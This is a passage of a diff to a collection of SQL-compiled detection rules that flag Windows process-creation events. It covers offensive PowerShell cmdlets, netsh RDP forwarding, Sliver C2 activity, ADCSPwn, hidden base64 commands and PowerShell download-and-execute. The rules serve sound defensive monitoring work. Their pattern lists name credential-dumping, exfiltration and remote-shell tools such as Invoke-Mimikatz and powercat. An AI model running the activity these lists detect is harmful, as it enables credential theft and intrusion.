"Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' 